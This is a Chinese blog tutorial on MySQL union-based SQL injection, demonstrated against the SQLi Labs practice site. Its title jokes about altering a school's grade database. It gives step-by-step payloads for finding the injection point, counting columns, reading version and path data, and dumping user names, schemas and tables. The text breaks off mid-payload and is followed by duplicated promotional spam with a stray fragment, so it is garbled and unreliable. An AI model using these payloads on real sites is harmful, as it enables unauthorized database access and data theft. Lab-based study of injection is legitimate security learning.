“有本事你去学校数据库把期末成绩改了“，“好，你等着(1)

• version()：返回数据库版本
• @@datadir：返回数据库安装路径

如果你不理解这个查询语句的格式，可以在自己的数据库中执行以下几个SQL，并观察结果：

select database();
select 1;
select 1,2,3;
select 1,database(),version();

3. 空查询

正常的用户id都是从1开始自增的，如果查询的id为0或者是负数，一定是空查询。

在地址栏输入：?id=0' union select 1,version(),@@datadir -- a

程序的执行逻辑如下：

除此之外，我们可以将 union 右侧的查询语句替换成其他内容，以获取数据库中的所有信息。

以上便是联合查询的基本原理，接下来，我们在实战案例中使用一下联合注入。

三、实战教程

还是上面的测试网站（SQLi Labs靶场的第一关），先来测试注入点。

地址栏输入 ?id=1' and 1 -- a，页面正常显示：

地址栏输入 ?id=1' and 0 -- a，页面异常（空）显示：

确定注入点：单引号字符型注入。

接下来，开始使用联合注入，地址栏输入以下payload：

?id=0' union select 1,2 -- a

页面报错了……字段数不同

MySQL规定，union 关键字连接的两个查询语句，查询的字段数必须保持一致。

这就意味着，我们在使用联合注入之前，必须先要判断网站的查询语句，查询了几个字段，这里，我们使用 order by 来判断查询的字段数。

order by 关键字可以按照指定字段排序，如果排序的字段不存在，则会报错。

利用这一特性，我们可以从第一个字段开始排序，然后是第二个、第三个……，当页面出现报错时，就可以判断出网站的查询字段数。

先按照第一个字段排序，地址栏输入 ?id=1' order by 1 -- a

再按照第二个字段排序，地址栏输入 ?id=1' order by 2 -- a

再按照第三个字段排序，地址栏输入 ?id=1' order by 3 -- a

再按照第四个字段排序，地址栏输入 ?id=1' order by 4 -- a

第四个字段排序时开始报错，可以确认第四个字段不存在，网站查询语句的查询字段有只有三个。

字段确定以后，我们就可以使用联合查询了，地址栏输入以下payload：

?id=0' union select 1,2,3 -- a

从页面的响应我们可以看到，2和3的位置可以显示出来，1的位置没有显示出来，因此，我们可以在2或者3的位置返回查询结果。

我们将 2 的位置换成一个函数（获取当前使用的数据库），在地址栏输入以下payload：

?id=0' union select 1,database(),3 -- a

页面中显示了当前使用的数据库：

接下来，我们在 2 的位置返回查询语句的结果（数据库的所有用户），在地址栏输入以下payload：

?id=0' union select 1,(select group_concat(user) from mysql.user),3 -- a

提示：

• 使用括号包裹SQL，可以让数据库把括号中的内容当做一个整体执行。
• 字段处使用 group_concat() 函数，可以将查询结果拼接成一个字符串（可以尝试不加此函数来观察页面的响应结果），不了解次函数的同学可以参考我的另一篇文章：MySQL group_concat函数使用详解

我们可以在 2 的位置替换不同的查询语句，来获取数据库中的所有数据。

接下来，我们整理一下联合注入的使用步骤。

四、使用步骤

使用前提：页面有显示位

比如用户登录成功以后，会在页面中显示用户名等信息。
需要注意的是，页面中显示的数据必须是动态数据，不能是写死的。

1. 判断注入点类型

同时满足以下两个条件：

?id=1 and true -- a		正常显示
?id=1 and false -- a	空显示

2. 判断字段数

?id=1 order by 1 -- a 正常显示
?id=1 order by 2 -- a 正常显示
?id=1 order by 3 -- a 报错或异常显示（字段数为2）

3. 判断显示位

?id=0 union select 1,2,3 -- a

4. 脱库

脱库就是获取数据库中所有数据的意思，不了解脱库的同学可以参考我的另一篇文章：MySQL脱库原理详解

爆库

?id=-1 union select 1,
	(select group_concat(schema_name)
     from information_schema.schemata)
,3 -- a

爆表

?id=-1 union select 1,
	(select group_concat(table_name)
     from information_schema.tables
	 where table_schema='security')
,3 -- a

爆字段

?id=-1 union select 1,
**先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7**

**深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/5709012883c62068e0ccac3a24204233.png)
![img](https://img-blog.csdnimg.cn/img_convert/459d305d91f2a5c0b326eae90e04e031.png)
![img](https://img-blog.csdnimg.cn/img_convert/1411b5ad0a1809e8d7fe28980d671966.png)
![img](https://img-blog.csdnimg.cn/img_convert/b0b8eb13e190a6924c27efbe3ccd5542.png)
![img](https://img-blog.csdnimg.cn/img_convert/f0dda57578a4e8c93d81f73cc125ef31.png)
![img](https://img-blog.csdnimg.cn/img_convert/78d9963f6c315167745c0c883ba113aa.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
089146)]

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**